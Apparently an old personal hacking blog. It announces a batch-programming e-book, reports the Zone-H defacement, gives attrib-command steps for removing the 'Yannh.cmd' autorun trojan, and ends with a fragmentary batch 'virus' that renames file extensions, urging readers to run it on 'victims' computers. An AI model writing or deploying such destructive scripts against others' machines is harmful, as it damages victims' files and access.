I am very happy to inform that the E-book on ‘Batch File Programming‘ authored by me is published on the Internet today. More over i have found 16 Reads and 26 Downloads with in 12 Minutes from the time of uploading in the popular Document uploading site http://www.scribd.com.
If you want to read the book online, you can check with this Link
You may also download and enjoy reading the book from the above given link.
http://www.Zone-H.org – considered as the Internet thermometer, that contains mirrors and archives of the defaced sites all around the world was hacked today at 11:43 am GMT wednessday Feb 11-2009.
It seems like it was defaced by arabian hackers. they have placed a viddeo content linked with youtube that plays the baby dance and was mentioned that they were bored, so the hackd the site to make fun.
Here i have enclosed the the snapshot how the defaced site (zone-h.org) looked like,
“yannh.cmd” is a Trojan that often spreads from external storage medias like USB, CD, DVD widely
by injecting into the autorun.inf file.
When i explored my autorun.inf, i found the few autorun entries made by “Yannh.cmd” like this,
You can’t directly edit the autorun.inf file while it is currently running, another thing you have to notice is, this file attribute is set to read only mode, hence you have to revoke it first to proceed further.
How can i Identify whether my computer got infected ?
open up your command prompt and type
dir /a – will clearly display all the hidden files in the drives.
This “Yannh.cmd” makes some registry entries in the following path…
and has its source file in the system32 directory with the name Kamsoft.
Here are the ways that helps you get rid of this Trojan.
Its is always recommended to back-up your registry before touching it, after a successful backup,
goto the below path
and delete Kamsoft.
Open up the command prompt and type the following
attrib -r -s -h yannh.cmd
This will delete the yannh.cmd file.
Now you have to delete the kamsoft folder from your system32 directory, just type the below commands in the command prompt.
attrib -r -s -h kamsoft.exe
Now you can edit the autorun.inf file to remove the entried added by yannh.cmd
attrib -r -h -s autorun.inf
Now delete where ever it says yannh.cmd and save changes.
Now you are done with it.
Here are the similar files that you must be aware of,
Zidan vs Tito.exe
Here I Have enclosed a simple Extension replaceable batch virus “Ext_change” Source code.
1. Open up a Notepad and copy and paste the below code.
Title Ext_Change Virus
Rem This Virus file replaces the actual file extensions with the given extensions
msg Your System got Infected…..
2. Save it with the extension .bat, and now you are ready to go….
3. Execute this on Victims computer to create havoc.
Its only you who is responsible for what you do with this…. we are not responsible for whatever you do with this… and it is only meant for educational means…
How it Works….
This Virus File will change the native extension with some other extension and makes them unable to open the file unless they know how to deal with it…
It replaces all the text files [.txt] with the extension [.jpeg], and likewise….